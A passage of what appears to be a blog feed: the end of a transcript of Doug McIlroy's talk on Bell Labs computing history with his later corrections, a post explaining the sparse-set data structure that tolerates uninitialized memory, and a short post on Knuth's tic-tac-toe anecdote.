Bell Labs, with George Mealy and Gwen Hanson, made an operating system, and one of the things they did was to bring the stop book to heel. They took the compiler, replaced all the stop instructions with jumps to somewhere, and allowed the program instead of stopping to go on to the next trial.
By the time I arrived at Bell Labs in 1958, this thing was running nicely.</p>
<p class=pp>[<i>McIlroy comments, 2015</i>: I’m pretty sure I was wrong in saying Mealy and Hanson brought
the stop book to heel. They built the OS, but I believe Dolores
Leagus tamed Fortran. (Dolores was the most accurate programmer I
ever knew. She’d write 2000 lines of code before testing a single
line--and it would work.)]</p>
<p class=pp><span style="font-size: 0.7em;">16:36</span>
Bell Labs continued to be a major player in operating systems.
This was called BESYS. BE was the SHARE abbreviation for Bell Labs. Each company that belonged to Share, which was the IBM users group, ahd a two letter abbreviation. It’s hard to imagine taking all the computer users now and giving them a two-letter abbreviation. BESYS went through many generations, up to BESYS 5, I believe. Each one with innovations. IBM delivered a machine, the 7090, in 1960. This machine had interrupts in it, but IBM didn’t use them. But BESYS did. And that sent IBM back to the drawing board to make it work. [Laughter]</p>
<p class=pp><span style="font-size: 0.7em;">17:48</span>
Rob Pike: It also didn’t have memory protection.</p>
<p class=pp>Doug: It didn’t have memory protection either, and a lot of people actually got IBM to put memory protection in the 7090, so that one could leave the operating system resident in the presence of a wild program, an idea that the PC didn’t discover until, last year or something like that. [laughter]</p>
<p class=pp>Big players then, <a href="http://en.wikipedia.org/wiki/Richard_Hamming">Dick Hamming</a>, a name that I’m sure everybody knows,
was sort of the numerical analysis guru, and a seer.
He liked to make outrageous predictions. He predicted in 1960, that half of Bell Labs was going to be busy doing something with computers eventually.
?...? exaggerating some ?...? abstract in his thought.
He was wrong.
Half was a gross underestimate. Dick Hamming retired twenty years ago, and just this June he completed his full twenty years term in the Navy, which entitles him again to retire from the Naval Postgraduate Institute in Monterey. Stibitz, incidentally died, I think within the last year.
He was doing medical instrumentation at Dartmouth essentially, near the end.</p>
<p class=pp>[<i>McIlroy comments, 2015</i>: I’m not sure what exact unintelligible words I uttered about Dick
Hamming. When he predicted that half the Bell Labs budget would
be related to computing in a decade, people scoffed in terms like
“that’s just Dick being himelf, exaggerating for effect”.]</p>
<p class=pp><span style="font-size: 0.7em;">20:00</span>
Various problems intrigued, besides the numerical problems, which in fact were stock in trade, and were the real justification for buying machines, until at least the ’70s I would say. But some non-numerical problems had begun to tickle the palette of the math department. Even G A Campbell got interested in graph theory, the reason being he wanted to think of all the possible ways you could take the three wires and the various parts of the telephone and connect them together, and try permutations to see what you could do about reducing sidetone by putting things into the various parts of the circuit, and devised every possibly way of connecting the telephone up. And that was sort of the beginning of combinatorics at Bell Labs. John Reardon, a mathematician parlayed this into a major subject. Two problems which are now deemed as computing problems, have intrigued the math department for a very long time, and those are the minimum spanning tree problem, and the wonderfully ?comment about Joe Kruskal, laughter?</p>
<p class=pp><span style="font-size: 0.7em;">21:50</span>
And in the 50s Bob Prim and Kruskal, who I don’t think worked on the Labs at that point, invented algorithms for the minimum spanning tree. Somehow or other, computer scientists usually learn these algorithms, one of the two at least, as Dijkstra’s algorithm, but he was a latecomer.</p>
<p class=pp>[<i>McIlroy comments, 2015</i>:
I erred in attributing Dijkstra’s algorithm to Prim and Kruskal. That
honor belongs to yet a third member of the math department: Ed
Moore. (Dijkstra’s algorithm is for shortest path, not spanning
tree.)]</p>
<p class=pp>Another pet was the traveling salesman. There’s been a long list of people at Bell Labs who played with that: Shen Lin and Ron Graham and David Johnson and dozens more, oh and ?...?. And then another problem is the Steiner minimum spanning tree, where you’re allowed to add points to the graph. Every one of these problems grew, actually had a justification in telephone billing. One jurisdiction or another would specify that the way you bill for a private line network was in one jurisdiction by the minimum spanning tree. In another jurisdiction, by the traveling salesman route. NP-completeness wasn’t a word in the vocabulary of lawmakers [laughter]. And the <a href="http://en.wikipedia.org/wiki/Steiner_tree">Steiner problem</a> came up because customers discovered they could beat the system by inventing offices in the middle of Tennessee that had nothing to do with their business, but they could put the office at a Steiner point and reduce their phone bill by adding to what the service that the Bell System had to give them. So all of these problems actually had some justification in billing besides the fun.</p>
<p class=pp><span style="font-size: 0.7em;">24:15</span>
Come the 60s, we actually started to hire people for computing per se. I was perhaps the third person who was hired with a Ph.D. to help take care of the computers and I’m told that the then director and head of the math department, Hendrick Bode, had said to his people, "yeah, you can hire this guy, instead of a real mathematician, but what’s he gonna be doing in five years?" [laughter]</p>
<p class=pp><span style="font-size: 0.7em;">25:02</span>
Nevertheless, we started hiring for real in about ’67. Computer science got split off from the math department. I had the good fortune to move into the office that I’ve been in ever since then. Computing began to make, get a personality of its own. One of the interesting people that came to Bell Labs for a while was Hao Wang. Is his name well known? [Pause] One nod. Hao Wang was a philosopher and logician, and we got a letter from him in England out of the blue saying "hey you know, can I come and use your computers? I have an idea about theorem proving." There was theorem proving in the air in the late 50s, and it was mostly pretty thin stuff. Obvious that the methods being proposed wouldn’t possibly do anything more difficult than solve tic-tac-toe problems by enumeration. Wang had a notion that he could mechanically prove theorems in the style of Whitehead and Russell’s great treatise Principia Mathematica in the early patr of the century. He came here, learned how to program in machine language, and took all of Volume I of Principia Mathematica --
if you’ve ever hefted Principia, well that’s about all it’s good for, it’s a real good door stop. It’s really big. But it’s theorem after theorem after theorem in propositional calculus. Of course, there’s a decision procedure for propositional calculus, but he was proving them more in the style of Whitehead and Russell. And when he finally got them all coded and put them into the computer, he proved the entire contents of this immense book in eight minutes.
This was actually a neat accomplishment. Also that was the beginning of all the language theory. We hired people like <a href="http://www1.cs.columbia.edu/~aho/">Al Aho</a> and <a href="http://infolab.stanford.edu/~ullman/">Jeff Ullman</a>, who probed around every possible model of grammars, syntax, and all of the things that are now in the standard undergraduate curriculum, were pretty well nailed down here, on syntax and finite state machines and so on were pretty well nailed down in the 60s. Speaking of finite state machines, in the 50s, both Mealy and Moore, who have two of the well-known models of finite state machines, were here.</p>
<p class=pp><span style="font-size: 0.7em;">28:40</span>
During the 60s, we undertook an enormous development project in the guise of research, which was <a href="http://www.multicians.org/">MULTICS</a>, and it was the notion of MULTICS was computing was the public utility of the future. Machines were very expensive, and ?indeed? like you don’t own your own electric generator, you rely on the power company to do generation for you, and it was seen that this was a good way to do computing -- time sharing -- and it was also recognized that shared data was a very good thing. MIT pioneered this and Bell Labs joined in on the MULTICS project, and this occupied five years of system programming effort, until Bell Labs pulled out, because it turned out that MULTICS was too ambitious for the hardware at the time, and also with 80 people on it was not exactly a research project. But, that led to various people who were on the project, in particular <a href="http://en.wikipedia.org/wiki/Ken_Thompson">Ken Thompson</a> -- right there -- to think about how to -- <a href="http://en.wikipedia.org/wiki/Dennis_Ritchie">Dennis Ritchie</a> and Rudd Canaday were in on this too -- to think about how you might make a pleasant operating system with a little less resources.</p>
<p class=pp><span style="font-size: 0.7em;">30:30</span>
And Ken found -- this is a story that’s often been told, so I won’t go into very much of unix -- Ken found an old machine cast off in the corner, the <a href="http://en.wikipedia.org/wiki/GE-600_series">PDP-7</a>, and put up this little operating system on it, and we had immense <a href="http://en.wikipedia.org/wiki/GE-600_series">GE635</a> available at the comp center at the time, and I remember as the department head, muscling in to use this little computer to be, to get to be Unix’s first user, customer, because it was so much pleasanter to use this tiny machine than it was to use the big and capable machine in the comp center. And of course the rest of the story is known to everybody and has affected all college campuses in the country.</p>
<p class=pp><span style="font-size: 0.7em;">31:33</span>
Along with the operating system work, there was a fair amount of language work done at Bell Labs. Often curious off-beat languages. One of my favorites was called <a href="http://hopl.murdoch.edu.au/showlanguage.prx?exp=6937&language=BLODI-B">Blodi</a>, B L O D I, a block diagram compiler by Kelly and Vyssotsky. Perhaps the most interesting early uses of computers in the sense of being unexpected, were those that came from the acoustics research department, and what the Blodi compiler was invented in the acoustic research department for doing digital simulations of sample data system. DSPs are classic sample data systems,
where instead of passing analog signals around, you pass around streams of numerical values. And Blodi allowed you to say here’s a delay unit, here’s an amplifier, here’s an adder, the standard piece parts for a sample data system, and each one was described on a card, and with description of what it’s wired to. It was then compiled into one enormous single straight line loop for one time step. Of course, you had to rearrange the code because some one part of the sample data system would feed another and produce really very efficient 7090 code for simulating sample data systems.
By in large, from that time forth, the acoustic department stopped making hardware. It was much easier to do signal processing digitally than previous ways that had been analog. Blodi had an interesting property. It was the only programming language I know where -- this is not my original observation, Vyssotsky said -- where you could take the deck of cards, throw it up the stairs, and pick them up at the bottom of the stairs, feed them into the computer again, and get the same program out. Blodi had two, aside from syntax diagnostics, it did have one diagnostic when it would fail to compile, and that was "somewhere in your system is a loop that consists of all delays or has no delays" and you can imagine how they handled that.</p>
<p class=pp><span style="font-size: 0.7em;">35:09</span>
Another interesting programming language of the 60s was <a href="http://www.knowltonmosaics.com/">Ken Knowlten</a>’s <a href="http://beflix.com/beflix.php">Beflix</a>. This was for making movies on something with resolution kind of comparable to 640x480, really coarse, and the
programming notion in here was bugs. You put on your grid a bunch of bugs, and each bug carried along some data as baggage,
and then you would do things like cellular automata operations. You could program it or you could kind of let it go by itself. If a red bug is next to a blue bug then it turns into a green bug on the following step and so on. <span style="font-size: 0.7em;">36:28</span> He and Lillian Schwartz made some interesting abstract movies at the time. It also did some interesting picture processing. One wonderful picture of a reclining nude, something about the size of that blackboard over there, all made of pixels about a half inch high each with a different little picture in it, picked out for their density, and so if you looked at it close up it consisted of pickaxes and candles and dogs, and if you looked at it far enough away, it was a <a href="http://blog.the-eg.com/2007/12/03/ken-knowlton-mosaics/">reclining nude</a>. That picture got a lot of play all around the country.</p>
<p class=pp>Lorinda Cherry: That was with Leon, wasn’t it? That was with <a href="https://en.wikipedia.org/wiki/Leon_Harmon">Leon Harmon</a>.</p>
<p class=pp>Doug: Was that Harmon?</p>
<p class=pp>Lorinda: ?...?</p>
<p class=pp>Doug: Harmon was also an interesting character. He did more things than pictures. I’m glad you reminded me of him. I had him written down here. Harmon was a guy who among other things did a block diagram compiler for writing a handwriting recognition program. I never did understand how his scheme worked, and in fact I guess it didn’t work too well. [laughter]
It didn’t do any production ?things? but it was an absolutely
immense sample data circuit for doing handwriting recognition.
Harmon’s most famous work was trying to estimate the information content in a face. And every one of these pictures which are a cliche now, that show a face digitized very coarsely, go back to Harmon’s <a href="https://web.archive.org/web/20080807162812/http://www.doubletakeimages.com/history.htm">first psychological experiments</a>, when he tried to find out how many bits of picture he needed to try to make a face recognizable. He went around and digitized about 256 faces from Bell Labs and did real psychological experiments asking which faces could be distinguished from other ones. I had the good fortune to have one of the most distinguishable faces, and consequently you’ll find me in freshman psychology texts through no fault of my own.</p>
<p class=pp><span style="font-size: 0.7em;">39:15</span>
Another thing going on the 60s was the halting beginning here of interactive computing. And again the credit has to go to the acoustics research department, for good and sufficient reason. They wanted to be able to feed signals into the machine, and look at them, and get them back out. They bought yet another weird architecture machine called the <a href="http://www.piercefuller.com/library/pb250.html">Packard Bell 250</a>, where the memory elements were <a href="http://en.wikipedia.org/wiki/Delay_line_memory">mercury delay lines</a>.</p>
<p class=pp>Question: Packard Bell?</p>
<p class=pp>Doug: Packard Bell, same one that makes PCs today.</p>
<p class=pp><span style="font-size: 0.7em;">40:10</span>
They hung this off of the comp center 7090 and put in a scheme for quickly shipping jobs into the job stream on the 7090. The Packard Bell was the real-time terminal that you could play with and repair stuff, ?...? off the 7090, get it back, and then you could play it. From that grew some graphics machines also, built by ?...? et al. And it was one of the old graphics machines
in fact that Ken picked up to build Unix on.</p>
<p class=pp><span style="font-size: 0.7em;">40:55</span>
Another thing that went on in the acoustics department was synthetic speech and music. <a href="http://csounds.com/mathews/index.html">Max Mathews</a>, who was the the director of the department has long been interested in computer music. In fact since retirement he spent a lot of time with Pierre Boulez in Paris at a wonderful institute with lots of money simply for making synthetic music. He had a language called Music 5. Synthetic speech or, well first of all simply speech processing was pioneered particularly by <a href="http://en.wikipedia.org/wiki/John_Larry_Kelly,_Jr">John Kelly</a>. I remember my first contact with speech processing. It was customary for computer operators, for the benefit of computer operators, to put a loudspeaker on the low bit of some register on the machine, and normally the operator would just hear kind of white noise. But if you got into a loop, suddenly the machine would scream, and this signal could be used to the operator "oh the machines in a loop. Go stop it and go on to the next job." I remember feeding them an Ackermann’s function routine once. [laughter] They were right. It was a silly loop. But anyway. One day, the operators were ?...?. The machine started singing. Out of the blue. “Help! I’m caught in a loop.”. [laughter] And in a broad Texas accent, which was the recorded voice of John Kelly.</p>
<p class=pp><span style="font-size: 0.7em;">43:14</span>
However. From there Kelly went on to do some speech synthesis. Of course there’s been a lot more speech synthesis work done since, by <span style="font-size: 0.7em;">43:31</span> folks like Cecil Coker, Joe Olive. But they produced a record, which unfortunately I can’t play because records are not modern anymore. And everybody got one in the Bell Labs Record, which is a magazine, contained once a record from the acoustics department, with both speech and music and one very famous combination where the computer played and sang "A Bicycle Built For Two".</p>
<p class=pp>?...?</p>
<p class=pp><span style="font-size: 0.7em;">44:32</span>
At the same time as all this stuff is going on here, needless
to say computing is going on in the rest of the Labs. it was about early 1960 when the math department lost its monopoly on computing machines and other people started buying them too, but for switching. The first experiments with switching computers were operational in around 1960. They were planned for several years prior to that; essentially as soon as the transistor was invented, the making of electronic rather than electromechanical switching machines was anticipated. Part of the saga of the switching machines is cheap memory. These machines had enormous memories -- thousands of words. [laughter] And it was said that the present worth of each word of memory that programmers saved across the Bell System was something like eleven dollars, as I recall. And it was worthwhile to struggle to save some memory. Also, programs were permanent. You were going to load up the switching machine with switching program and that was going to run. You didn’t change it every minute or two. And it would be cheaper to put it in read only memory than in core memory. And there was a whole series of wild read-only memories, both tried and built.
The first experimental Essex System had a thing called the flying spot store
which was large photographic plates with bits on them and CRTs projecting on the plates and you would detect underneath on the photodetector whether the bit was set or not. That was the program store of Essex. The program store of the first ESS systems consisted of twistors, which I actually am not sure I understand to this day, but they consist of iron wire with a copper wire wrapped around them and vice versa. There were also experiments with an IC type memory called the waffle iron. Then there was a period when magnetic bubbles were all the rage. As far as I know, although microelectronics made a lot of memory, most of the memory work at Bell Labs has not had much effect on ?...?. Nice tries though.</p>
<p class=pp><span style="font-size: 0.7em;">48:28</span>
Another thing that folks began to work on was the application of (and of course, right from the start) computers to data processing. When you owned equipment scattered through every street in the country, and you have a hundred million customers, and you have bills for a hundred million transactions a day, there’s really some big data processing going on. And indeed in the early 60s, AT&T was thinking of making its own data processing computers solely for billing. Somehow they pulled out of that, and gave all the technology to IBM, and one piece of that technology went into use in high end equipment called tractor tapes. Inch wide magnetic tapes that would be used for a while.</p>
<p class=pp><span style="font-size: 0.7em;">49:50</span>
By in large, although Bell Labs has participated until fairly recently in data processing in quite a big way, AT&T never really quite trusted the Labs to do it right because here is where the money is. I can recall one occasion when during strike of temporary employees, a fill-in employee like from the
Laboratories and so on, lost a day’s billing tape in Chicago. And that was a million dollars. And that’s generally speaking the money people did not until fairly recently trust Bell Labs to take good care of money, even though they trusted the Labs very well to make extremely reliable computing equipment for switches.
The downtime on switches is still spectacular by any industry standards. The design for the first ones was two hours down in 40 years, and the design was met. Great emphasis on reliability and redundancy, testing.</p>
<p class=pp><span style="font-size: 0.7em;">51:35</span>
Another branch of computing was for the government. The whole Whippany Laboratories [time check]
Whippany, where we took on contracts for the government particularly in the computing era in anti-missile defense, missile defense, and underwater sound. Missile defense was a very impressive undertaking. It was about in the early ’63 time frame when it was estimated the amount of computation to do a reasonable job of tracking incoming missiles would be 30 M floating point operations a second. In the day of the Cray that doesn’t sound like a great lot, but it’s more than your high end PCs can do. And the machines were supposed to be reliable. They designed the machines at Whippany, a twelve-processor multiprocessor, to no specs, enormously rugged, one watt transistors. This thing in real life performed remarkably well. There were sixty-five missile shots, tests across the Pacific Ocean ?...? and Lorinda Cherry here actually sat there waiting for them to come in. [laughter] And only a half dozen of them really failed. As a measure of the interest in reliability, one of them failed apparently due to processor error. Two people were assigned to look at the dumps, enormous amounts of telemetry and logging information were taken during these tests, which are truly expensive to run. Two people were assigned to look at the dumps. A year later they had not found the trouble. The team was beefed up. They finally decided that there was a race condition in one circuit. They then realized that this particular kind of race condition had not been tested for in all the simulations. They went back and simulated the entire hardware system to see if its a remote possibility of any similar cases, found twelve of them, and changed the hardware. But to spend over a year looking for a bug is a sign of what reliability meant.</p>
<p class=pp><span style="font-size: 0.7em;">54:56</span>
Since I’m coming up on the end of an hour, one could go on and on and on,</p>
<p class=pp>Crowd: go on, go on. [laughter]</p>
<p class=pp><span style="font-size: 0.7em;">55:10</span>
Doug: I think I’d like to end up by mentioning a few of the programs that have been written at Bell Labs that I think are most surprising. Of course there are lots of grand programs that have been written.</p>
<p class=pp>I already mentioned the block diagram compiler.</p>
<p class=pp>Another really remarkable piece of work was <a href="eqn.pdf">eqn</a>, the equation
typesetting language, which has been imitated since, by Lorinda Cherry and Brian Kernighan. The notion of taking an auditory syntax, the way people talk about equations, but only talk, this was not borrowed from any written notation before, getting the auditory one down on paper, that was very successful and surprising.</p>
<p class=pp>Another of my favorites, and again Lorinda Cherry was in this one, with Bob Morris, was typo. This was a program for finding spelling errors. It didn’t know the first thing about spelling. It would read a document, measure its statistics, and print out the words of the document in increasing order of what it thought the likelihood of that word having come from the same statistical source as the document. The words that did not come from the statistical source of the document were likely to be typos, and now I mean typos as distinct from spelling errors, where you actually hit the wrong key. Those tend to be off the wall, whereas phonetic spelling errors you’ll never find. And this worked remarkably well. Typing errors would come right up to the top of the list. A really really neat program.</p>
<p class=pp><span style="font-size: 0.7em;">57:50</span>
Another one of my favorites was by Brenda Baker called <a href="http://doi.acm.org/10.1145/800168.811545">struct</a>, which took Fortran programs and converted them into a structured programming language called Ratfor, which was Fortran with C syntax. This seemed like a possible undertaking, like something you do by the seat of the pants and you get something out. In fact, folks at Lockheed had done things like that before. But Brenda managed to find theorems that said there’s really only one form, there’s a canonical form into which you can structure a Fortran program, and she did this. It took your Fortran program, completely mashed it, put it out perhaps in almost certainly a different order than it was in Fortran connected by GOTOs, without any GOTOs, and the really remarkable thing was that authors of the program who clearly knew the way they wrote it in the first place, preferred it after it had been rearranged by Brendan. I was astonished at the outcome of that project.</p>
<p class=pp><span style="font-size: 0.7em;">59:19</span>
Another first that happened around here was by Fred Grampp, who got interested in computer security. One day he decided he would make a program for sniffing the security arrangements on a computer, as a service: Fred would never do anything crooked. [laughter] This particular program did a remarkable job, and founded a whole minor industry within the company. A department was set up to take this idea and parlay it, and indeed ever since there has been some improvement in the way computer centers are managed, at least until we got Berkeley Unix.</p>
<p class=pp><span style="font-size: 0.7em;">60:24</span>
And the last interesting program that I have time to mention is one by <a href="http://www.cs.jhu.edu/~kchurch/">Ken Church</a>. He was dealing with -- text processing has always been a continuing ?...? of the research, and in some sense it has an application to our business because we’re handling speech, but he got into consulting with the department in North Carolina that has to translate manuals. There are millions of pages of manuals in the Bell System and its successors, and ever since we’ve gone global, these things had to get translated into many languages.</p>
<p class=pp><span style="font-size: 0.7em;">61:28</span>
To help in this, he was making tools which would put up on the screen, graphed on the screen quickly a piece of text and its translation, because a translator, particularly a technical translator, wants to know, the last time we mentioned this word how was it translated. You don’t want to be creative in translating technical text. You’d like to be able to go back into the archives and pull up examples of translated text. And the neat thing here is the idea for how do you align texts in two languages. You’ve got the original, you’ve got the translated one, how do you bring up on the screen, the two sentences that go together? And the following scam worked beautifully. This is on western languages. <span style="font-size: 0.7em;">62:33</span>
Simply look for common four letter tetragrams, four letter combinations between the two and as best as you can, line them up as nearly linearly with the lengths of the two types as possible. And this <a href="church-tetragram.pdf">very simple idea</a> works like storm. Something for nothing. I like that.</p>
<p class=pp><span style="font-size: 0.7em;">63:10</span>
The last thing is one slogan that sort of got started with Unix and is just rife within the industry now. Software tools. We were making software tools in Unix before we knew we were, just like the Molière character was amazed at discovering he’d been speaking prose all his life. [laughter] But then <a href="http://www.amazon.com/-/dp/020103669X">Kernighan and Plauger</a> came along and christened what was going on, making simple generally useful and compositional programs to do one thing and do it well and to fit together. They called it software tools, made a book, wrote a book, and this notion now is abroad in the industry. And it really did begin all up in the little attic room where you [points?] sat for many years writing up here.</p>
<p class=pp> Oh I forgot to. I haven’t used any slides. I’ve brought some, but I don’t like looking at bullets and you wouldn’t either, and I forgot to show you the one exhibit I brought, which I borrowed from Bob Kurshan. When Bell Labs was founded, it had of course some calculating machines, and it had one wonderful computer. This. That was bought in 1918. There’s almost no other computing equipment from any time prior to ten years ago that still exists in Bell Labs. This is an <a href="http://infolab.stanford.edu/pub/voy/museum/pictures/display/2-5-Mechanical.html">integraph</a>. It has two styluses. You trace a curve on a piece of paper with one stylus and the other stylus draws the indefinite integral here. There was somebody in the math department who gave this service to the whole company, with about 24 hours turnaround time, calculating integrals. Our recent vice president Arno Penzias actually did, he calculated integrals differently, with a different background. He had a chemical balance, and he cut the curves out of the paper and weighed them. This was bought in 1918, so it’s eighty years old. It used to be shiny metal, it’s a little bit rusty now. But it still works.</p>
<p class=pp><span style="font-size: 0.7em;">66:30</span>
Well, that’s a once over lightly of a whole lot of things that have gone on at Bell Labs. It’s just such a fun place that one I said I just could go on and on. If you’re interested, there actually is a history written. This is only one of about six volumes, <a href="http://www.amazon.com/gp/product/0932764061">this</a> is the one that has the mathematical computer sciences, the kind of things that I’ve mostly talked about here. A few people have copies of them. For some reason, the AT&T publishing house thinks that because they’re history they’re obsolete, and they stopped printing them. [laughter]</p>
<p class=pp>Thank you, and that’s all.</p></p>
Using Uninitialized Memory for Fun and Profittag:research.swtch.com,2012:research.swtch.com/sparse2008-03-14T00:00:00-04:002008-03-14T00:00:00-04:00An unusual but very useful data structure
<p><p class=lp>
This is the story of a clever trick that's been around for
at least 35 years, in which array values can be left
uninitialized and then read during normal operations,
yet the code behaves correctly no matter what garbage
is sitting in the array.
Like the best programming tricks, this one is the right tool for the
job in certain situations.
The sleaziness of uninitialized data
access is offset by performance improvements:
some important operations change from linear
to constant time.
</p>
<p class=pp>
Alfred Aho, John Hopcroft, and Jeffrey Ullman's 1974 book
<i>The Design and Analysis of Computer Algorithms</i>
hints at the trick in an exercise (Chapter 2, exercise 2.12):
</p>
<blockquote>
Develop a technique to initialize an entry of a matrix to zero
the first time it is accessed, thereby eliminating the <i>O</i>(||<i>V</i>||<sup>2</sup>) time
to initialize an adjacency matrix.
</blockquote>
<p class=lp>
Jon Bentley's 1986 book <a href="http://www.cs.bell-labs.com/cm/cs/pearls/"><i>Programming Pearls</i></a> expands
on the exercise (Column 1, exercise 8; <a href="http://www.cs.bell-labs.com/cm/cs/pearls/sec016.html">exercise 9</a> in the Second Edition):
</p>
<blockquote>
One problem with trading more space for less time is that
initializing the space can itself take a great deal of time.
Show how to circumvent this problem by designing a technique
to initialize an entry of a vector to zero the first time it is
accessed. Your scheme should use constant time for initialization
and each vector access; you may use extra space proportional
to the size of the vector. Because this method reduces
initialization time by using even more space, it should be
considered only when space is cheap, time is dear, and
the vector is sparse.
</blockquote>
<p class=lp>
Aho, Hopcroft, and Ullman's exercise talks about a matrix and
Bentley's exercise talks about a vector, but for now let's consider
just a simple set of integers.
</p>
<p class=pp>
One popular representation of a set of <i>n</i> integers ranging
from 0 to <i>m</i> is a bit vector, with 1 bits at the
positions corresponding to the integers in the set.
Adding a new integer to the set, removing an integer
from the set, and checking whether a particular integer
is in the set are all very fast constant-time operations
(just a few bit operations each).
Unfortunately, two important operations are slow:
iterating over all the elements in the set
takes time <i>O</i>(<i>m</i>), as does clearing the set.
If the common case is that
<i>m</i> is much larger than <i>n</i>
(that is, the set is only sparsely
populated) and iterating or clearing the set
happens frequently, then it could be better to
use a representation that makes those operations
more efficient. That's where the trick comes in.
</p>
<p class=pp>
Preston Briggs and Linda Torczon's 1993 paper,
“<a href="http://citeseer.ist.psu.edu/briggs93efficient.html"><b>An Efficient Representation for Sparse Sets</b></a>,”
describes the trick in detail.
Their solution represents the sparse set using an integer
array named <code>dense</code> and an integer <code>n</code>
that counts the number of elements in <code>dense</code>.
The <i>dense</i> array is simply a packed list of the elements in the
set, stored in order of insertion.
If the set contains the elements 5, 1, and 4, then <code>n = 3</code> and
<code>dense[0] = 5</code>, <code>dense[1] = 1</code>, <code>dense[2] = 4</code>:
</p>
<center>
<img src="https://research.swtch.com/sparse0.png" />
</center>
<p class=pp>
Together <code>n</code> and <code>dense</code> are
enough information to reconstruct the set, but this representation
is not very fast.
To make it fast, Briggs and Torczon
add a second array named <code>sparse</code>
which maps integers to their indices in <code>dense</code>.
Continuing the example,
<code>sparse[5] = 0</code>, <code>sparse[1] = 1</code>,
<code>sparse[4] = 2</code>.
Essentially, the set is a pair of arrays that point at
each other:
</p>
<center>
<img src="https://research.swtch.com/sparse0b.png" />
</center>
<p class=pp>
Adding a member to the set requires updating both of these arrays:
</p>
<pre class=indent>
add-member(i):
dense[n] = i
sparse[i] = n
n++
</pre>
<p class=lp>
It's not as efficient as flipping a bit in a bit vector, but it's
still very fast and constant time.
</p>
<p class=pp>
To check whether <code>i</code> is in the set, you verify that
the two arrays point at each other for that element:
</p>
<pre class=indent>
is-member(i):
return sparse[i] < n && dense[sparse[i]] == i
</pre>
<p class=lp>
If <code>i</code> is not in the set, then <i>it doesn't matter what <code>sparse[i]</code> is set to</i>:
either <code>sparse[i]</code>
will be bigger than <code>n</code> or it will point at a value in
<code>dense</code> that doesn't point back at it.
Either way, we're not fooled. For example, suppose <code>sparse</code>
actually looks like:
</p>
<center>
<img src="https://research.swtch.com/sparse1.png" />
</center>
<p class=lp>
<code>Is-member</code> knows to ignore
members of sparse that point past <code>n</code> or that
point at cells in <code>dense</code> that don't point back,
ignoring the grayed out entries:
<center>
<img src="https://research.swtch.com/sparse2.png" />
</center>
<p class=pp>
Notice what just happened:
<code>sparse</code> can have <i>any arbitrary values</i> in
the positions for integers not in the set,
those values actually get used during membership
tests, and yet the membership test behaves correctly!
(This would drive <a href="http://valgrind.org/">valgrind</a> nuts.)
</p>
<p class=pp>
Clearing the set can be done in constant time:
</p>
<pre class=indent>
clear-set():
n = 0
</pre>
<p class=lp>
Zeroing <code>n</code> effectively clears
<code>dense</code> (the code only ever accesses
entries in dense with indices less than <code>n</code>), and
<code>sparse</code> can be uninitialized, so there's no
need to clear out the old values.
</p>
<p class=pp>
This sparse set representation has one more trick up its sleeve:
the <code>dense</code> array allows an
efficient implementation of set iteration.
</p>
<pre class=indent>
iterate():
for(i=0; i<n; i++)
yield dense[i]
</pre>
<p class=pp>
Let's compare the run times of a bit vector
implementation against the sparse set:
</p>
<center>
<table>
<tr>
<td><i>Operation</i>
<td align=center width=10>
<td align=center><i>Bit Vector</i>
<td align=center width=10>
<td align=center><i>Sparse set</i>
</tr>
<tr>
<td>is-member
<td>
<td align=center><i>O</i>(1)
<td>
<td align=center><i>O</i>(1)
</tr>
<tr>
<td>add-member
<td>
<td align=center><i>O</i>(1)
<td>
<td align=center><i>O</i>(1)
</tr>
<tr>
<td>clear-set
<td><td align=center><i>O</i>(<i>m</i>)
<td><td align=center><i>O</i>(1)
</tr>
<tr>
<td>iterate
<td><td align=center><i>O</i>(<i>m</i>)
<td><td align=center><i>O</i>(<i>n</i>)
</tr>
</table>
</center>
<p class=lp>
The sparse set is as fast or faster than bit vectors for
every operation. The only problem is the space cost:
two words replace each bit.
Still, there are times when the speed differences are enough
to balance the added memory cost.
Briggs and Torczon point out that liveness sets used
during register allocation inside a compiler are usually
small and are cleared very frequently, making sparse sets the
representation of choice.
</p>
<p class=pp>
Another situation where sparse sets are the better choice
is work queue-based graph traversal algorithms.
Iteration over sparse sets visits elements
in the order they were inserted (above, 5, 1, 4),
so that new entries inserted during the iteration
will be visited later in the same iteration.
In contrast, iteration over bit vectors visits elements in
integer order (1, 4, 5), so that new elements inserted
during traversal might be missed, requiring repeated
iterations.
</p>
<p class=pp>
Returning to the original exercises, it is trivial to change
the set into a vector (or matrix) by making <code>dense</code>
an array of index-value pairs instead of just indices.
Alternately, one might add the value to the <code>sparse</code>
array or to a new array.
The relative space overhead isn't as bad if you would have been
storing values anyway.
</p>
<p class=pp>
Briggs and Torczon's paper implements additional set
operations and examines performance speedups from
using sparse sets inside a real compiler.
</p></p>
Play Tic-Tac-Toe with Knuthtag:research.swtch.com,2012:research.swtch.com/tictactoe2008-01-25T00:00:00-05:002008-01-25T00:00:00-05:00The only winning move is not to play.
<p><p class=lp>Section 7.1.2 of the <b><a href="http://www-cs-faculty.stanford.edu/~knuth/taocp.html#vol4">Volume 4 pre-fascicle 0A</a></b> of Donald Knuth's <i>The Art of Computer Programming</i> is titled “Boolean Evaluation.” In it, Knuth considers the construction of a set of nine boolean functions telling the correct next move in an optimal game of tic-tac-toe. In a footnote, Knuth tells this story:</p>
<blockquote><p class=lp>This setup is based on an exhibit from the early 1950s at the Museum of Science and Industry in Chicago, where the author was first introduced to the magic of switching circuits. The machine in Chicago, designed by researchers at Bell Telephone Laboratories, allowed me to go first; yet I soon discovered there was no way to defeat it. Therefore I decided to move as stupidly as possible, hoping that the designers had not anticipated such bizarre behavior. In fact I allowed the machine to reach a position where it had two winning moves; and it seized <i>both</i> of them! Moving twice is of course a flagrant violation of the rules, so I had won a moral victory even though the machine had announced that I had lost.</p></blockquote>
<p class=lp>
That story alone is fairly amusing. But turning the page, the reader finds a quotation from Charles Babbage's <i><a href="http://onlinebooks.library.upenn.edu/webbin/book/lookupid?key=olbp36384">Passages from the Life of a Philosopher</a></i>, published in 1864:</p>
<blockquote><p class=lp>I commenced an examination of a game called “tit-tat-to” ... to ascertain what number of combinations were required for all the possible variety of moves and situations. I found this to be comparatively insignificant. ... A difficulty, however, arose of a novel kind. When the automaton had to move, it might occur that there were two different moves, each equally conducive to his winning the game. ... Unless, also, some provision were made, the machine would attempt two contradictory motions.</p></blockquote>
<p class=lp>
The only real winning move is not to play.</p></p>
Crabs, the bitmap terror!tag:research.swtch.com,2012:research.swtch.com/crabs2008-01-09T00:00:00-05:002008-01-09T00:00:00-05:00A destructive, pointless violation of the rules
